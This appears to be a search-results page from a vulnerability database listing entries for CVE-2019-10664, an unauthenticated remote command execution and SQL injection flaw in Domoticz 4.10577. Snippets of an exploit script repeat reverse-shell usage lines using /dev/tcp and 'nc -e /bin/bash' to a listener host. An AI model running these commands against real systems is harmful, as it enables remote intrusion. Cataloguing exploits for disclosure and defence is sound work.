5 matches found
Domoticz 4.10577 - Unauthenticated Remote Command Execution Exploit
Exploit for multiple platform in category web applications !/usr/bin/env python -- coding: utf-8 -- Exploit Title: Unauthenticated Remote Command Execution on Domoticz & /dev/tcp/172.17.0.1/4444 0&1 &' ./exploit.py -zipcmd http://localhost:8080/ 'nc 10.0.2.2 4444 -e /bin/bash &' import argparse...
Domoticz 4.10577 Unauthenticated Remote Command Execution
!/usr/bin/env python -- coding: utf-8 -- Exploit Title: Unauthenticated Remote Command Execution on Domoticz & /dev/tcp/172.17.0.1/4444 0&1 &' ./exploit.py -zipcmd http://localhost:8080/ 'nc 10.0.2.2 4444 -e /bin/bash &' import argparse import requests import urllib import base64 import json impo...
CVE-2019-10664
creationtimestamp| type| source ---|---|--- 2019-04-30 00:00:00+00:00| exploited| https://www.exploit-db.com/exploits/46773...
Domoticz 4.10577 - Unauthenticated Remote Command Execution
!/usr/bin/env python -- coding: utf-8 -- Exploit Title: Unauthenticated Remote Command Execution on Domoticz & /dev/tcp/172.17.0.1/4444 0&1 &' ./exploit.py -zipcmd http://localhost:8080/ 'nc 10.0.2.2 4444 -e /bin/bash &' import argparse import requests import urllib import base64 import json impo...
CVE-2019-10664
Domoticz exposure CVE-2019-10664 affects versions before 4.10578, where an SQL Injection is possible via the idx parameter in CWebServer::GetFloorplanImage (WebServer.cpp). Root cause is unsafeguarded SQL handling in the web server component. Reported impact includes potential escalation of acces...